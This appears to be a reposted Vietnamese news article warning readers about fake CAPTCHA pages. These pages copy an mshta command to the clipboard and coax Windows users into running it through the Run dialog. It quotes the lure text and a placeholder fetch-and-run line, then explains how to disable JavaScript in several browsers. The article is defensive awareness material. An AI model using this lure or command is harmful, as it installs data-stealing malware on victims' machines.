Hacker giờ xịn sò lắm: Dùng CAPTCHA fake, lừa bạn tự tay cài virus chỉ với 5 cái click

Ai lướt web cũng biết CAPTCHA rồi đúng không? Nhưng chính vì quá quen nên giờ hacker lợi dụng để lừa đảo luôn rồi các bro ơi!

Thời buổi internet phủ sóng khắp mọi nơi này, bọn hacker ngày càng sáng tạo ra trò để lừa người dùng. Dạo gần đây, xuất hiện siêu nhiều vụ tấn công thông qua thứ mà ai cũng thấy hằng ngày: CAPTCHA đó.

CAPTCHA - viết tắt của "Completely Automated Public Turing test to tell Computers and Humans Apart" (nghe fancy ghê nhưng dịch ra là "Phép thử Turing công cộng hoàn toàn tự động để phân biệt máy tính với người" ) - là cơ chế giúp các website chặn những lượt truy cập tự động spam, tránh làm quá tải server.

Nói cho dễ hiểu thì CAPTCHA là "bức tường lửa" ngăn bot truy cập liên tục làm nghẽn mạng. Nó đơn giản là công cụ để phân biệt người thật và bot thôi.

3d9139d9e6c36d8be76c.jpg


CAPTCHA siêu đa dạng đấy: lúc thì bắt gõ đoạn chữ bị bẻ cong méo mó, lúc thì ghép hình, có khi lại bắt tìm hình mèo, xe đạp hay đèn giao thông (ai cũng từng khóc với cái này rồi đúng không? ).

Nhưng mà giờ bọn hacker đã nghĩ ra cách tạo CAPTCHA độc hại mới. Ví dụ như khi bạn vào trang xem phim, nghe nhạc, xem ảnh hay đọc báo, sẽ có dòng thông báo hiện lên như này:

c5217879d3b6bb7fdb30.jpg


Nhìn quen không? Tick vào ô để xác nhận "Tôi không phải người máy" đó - kiểu CAPTCHA ai cũng biết. Nhưng plot twist đây rồi!

Sau khi tick xong, bạn sẽ bị chuyển sang trang khác, hiển thị hướng dẫn bắt bạn làm theo. Và không ít người sẽ bị lừa bởi những chỉ dẫn "trông vô hại" này. Nếu làm theo, máy Windows của bạn sẽ tự động tải file độc hại về luôn!

Trang web vừa rồi sẽ tự copy một đoạn text ngắn vào clipboard của máy (giống như khi bạn bấm Ctrl+C ý). Phải nói thêm là trên các trình duyệt gốc Chromium - tức hầu hết các trình duyệt phổ biến hiện giờ - website chỉ làm được điều này khi bạn cho phép thôi nhé.

a8774d2cbcd612b13a04.jpg


Nội dung bẫy như sau:

"Thực hiện những bước xác thực dưới đây:

Để chứng minh một cách tốt hơn rằng bạn không phải người máy, hãy:

1. Bấm và giữ nút Windows và R.
2. Trong hộp thoại xác nhận, bấm Ctrl+V
3. Bấm Enter để hoàn thành

Bạn sẽ quan sát được và đồng ý với nội dung sau:

'Tôi không phải người máy - ID Xác nhận reCAPTCHA: 8253'

Thực hiện những bước trên để hoàn thành việc xác thực."

Khi bạn click vào ô "Tôi không phải người máy", Windows đã hiểu là bạn đồng ý cho copy text vào clipboard rồi. Hành động này nghe có vẻ ổn, cho đến khi bạn làm theo các bước tiếp theo...

Bằng một chiêu "kỹ nghệ xã hội" (social engineering) siêu tinh vi, lừa bạn làm những thao tác vẫn hay làm khi lướt web, bọn hacker đã dẫn bạn đến bảng hướng dẫn làm theo những bước này:

1. Mở hộp thoại Run trên Windows
2. Paste nội dung đang lưu trong clipboard - là một đoạn text ngắn
3. Bấm Enter và boom - lệnh tải virus về máy được thực thi!

Trong phần hướng dẫn có dòng "Bạn sẽ quan sát được và đồng ý với nội dung sau: 'Tôi không phải người máy - ID Xác nhận reCAPTCHA: 8253'". Nhưng thực ra, đây chỉ là đoạn CUỐI của một lệnh tải dài lê thê. Phần ĐẦU của nội dung copy/paste trông như này:

mshtahttps://{tênmiền độc hại}/media.file

Trên Windows, "mshta" là lệnh chạy file lành tính tên mshta.exe, nhưng trong trường hợp này, lệnh sẽ tải và chạy file độc hại từ domain kia. Theo các research tại Malwarebytes Labs, những file tải về đều có đuôi quen thuộc như mp3, mp4, jpg, jpeg, swf, html. Họ cho rằng còn nhiều đuôi file khác nữa đấy.

Thực ra những file này là lệnh Powershell được mã hóa, sẽ chạy ngầm trong hệ thống và tải virus về. Trong một số case được kiểm tra, lệnh mshta đã tải file độc, và file này lại tiếp tục tải thêm các phần mềm ăn cắp data trên máy. Ghê chưa!

Làm sao để tự bảo vệ mình?

Đầu tiên và quan trọng nhất: phải tỉnh táo khi dùng internet nhé các bạn! Đặc biệt là khi cạm bẫy giờ ngày càng tinh vi. Đừng làm theo các hướng dẫn đáng ngờ trên mạng, kẻo rước họa vào thân và rước virus vào máy luôn!

Nhân tiện nói về hướng dẫn, mình xin chia sẻ cách vô hiệu hóa JavaScript trên một số trình duyệt gốc Chromium. Về cơ bản, website có thể tự ý copy text vào clipboard nhờ hàm JavaScript tên là document.execCommand('copy').

Việc tắt JavaScript có thể hạn chế những cuộc tấn công kiểu này, tuy nhiên nó có thể làm một số website bạn hay dùng không hoạt động bình thường đâu nha.

Chrome

1. Mở Chrome và click vào icon ba chấm ở góc trên bên phải
2. Chọn Cài đặt từ menu thả xuống
3. Ở thanh bên trái, click vào Quyền riêng tư và bảo mật
4. Chọn Cài đặt trang web
5. Cuộn xuống phần Nội dung và click vào JavaScript
6. Chọn Không cho phép trang web sử dụng JavaScript
7. Bạn cũng có thể thêm các trang web cụ thể vào danh sách Chặn hoặc Cho phép bằng cách click từng mục tương ứng

Firefox

1. Gõ about:config vào thanh tìm kiếm, chọn Chấp nhận rủi ro và tiếp tục
2. Gõ javascript.enabled vào ô tìm kiếm ở đầu trang
3. Click vào tùy chọn javascript.enabled để chuyển giá trị thành false (tắt JavaScript)

Opera

1. Mở Opera và click vào icon Cài đặt
2. Chọn Quyền riêng tư & Bảo mật
3. Click vào Cài đặt trang web
4. Chọn tùy chọn JavaScript
5. Chọn Không cho phép trang web sử dụng JavaScript để tắt JavaScript trên tất cả các trang
6. Để tắt JavaScript cho từng trang cụ thể, click vào Thêm trong phần Không được phép sử dụng JavaScript, sau đó nhập URL của trang web

Microsoft Edge

1. Mở Microsoft Edge và click vào icon ba chấm ở góc trên bên phải
2. Chọn Cài đặt từ menu thả xuống
3. Ở thanh bên trái, click vào Cookies và quyền trang web
4. Cuộn xuống phần Tất cả quyền và chọn JavaScript
5. Gạt công tắc để tắt JavaScript
6. Bạn cũng có thể quản lý JavaScript cho từng trang bằng cách thêm chúng vào danh sách Chặn hoặc Cho phép

Nguồn: soha.vn
 
Back
Top